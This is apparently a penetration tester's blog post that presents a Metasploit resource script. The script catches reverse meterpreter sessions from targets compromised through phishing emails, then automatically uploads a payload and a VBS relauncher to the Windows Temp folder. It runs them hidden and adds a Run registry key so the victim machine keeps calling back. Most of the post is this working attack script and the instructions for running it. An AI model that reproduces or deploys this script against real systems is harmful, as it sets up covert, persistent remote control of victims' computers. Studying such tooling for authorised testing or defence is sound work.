A while back I did a post about persistent meterpreter. This was a way to make the system continually attempt a reverse connection back to the Metasploit multi/handler listener. Well recently I was on a pentest engagement where I wanted to do some social engineering attacks with email. I used a combination of the IE Aurora vulnerability as well as the PDF embedded EXE vulnerabilities.
So, I needed a way to launch my multi/handler and have it automatically setup persistence once a client connected. There is a persistence.rc script written by darkoperator in the Metasploit Framework repository, but it is a more interactive script that you might run inside an existing meterpreter session. I needed something that would require no interaction. So, with a little borrowed code from a ruby block example, I mashed up this script.
#
# Script to automatically install a meterpreter/reverse_tcp payload and a VBS script for persistent connection to attacker.
#
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 1.2.3.4
set ExitOnSession false
#
exploit -j
#
# The first sleep below is not necessary, but makes the output cleaner
#
sleep(1)
#
print_status("Waiting on an incoming sessions...")
while (true)
framework.sessions.each_pair do |sid,s|
thost = s.tunnel_peer.split(":")[0]
#
# Ensure that stdapi has been loaded before running
if s.ext.aliases['stdapi']
sleep(1)
print_status("Uploading files to session #{sid} #{thost}...")
s.console.run_single("upload reverse.exe persist.vbs C:\\\\\WINDOWS\\\\\Temp")
print_status("Executing persistent script...")
s.console.run_single("execute -H -f 'cmd.exe /c cscript C:\\\\\WINDOWS\\\\\Temp\\\\\persist.vbs'")
print_status("Creating Registry Key...")
s.console.run_single("reg setval -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run -v msfpersist -d 'C:\\\WINDOWS\\\Temp\\\persist.vbs'")
s.console.run_single("reg queryval -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\Run -v msfpersist")
print_status("Closing session #{sid} #{thost}...")
s.kill
else
print_status("Session #{sid} #{thost} active, but not yet configured")
end
#
end
sleep(1)
end
#
print_status("All done")
#
# Kill all open sessions
sessions -K
#
# Exit the console (optional)
exit
The lines got a little split so you can download this script at the end of this post. Basically you want to set the LHOST and the LPORT for the machine running the listener. The “reverse.exe” represents the payload executable, and the “persist.vbs” represents the vbs script which will run on the victim machine and launch the reverse.exe if it is not already running. Both files need be either in the same directory as msfconsole.rc or the path needs to be specified.
You invoke this script by the following:
./msfconsole -r autopersist.rc
This script could be refined much better, but it accomplished what I needed. So, if anyone has any suggestions feel free to comment.
Download: autopersist.vbs
MD5 checksum: 453bbd3e5b95ee1045431bbe2f92c118
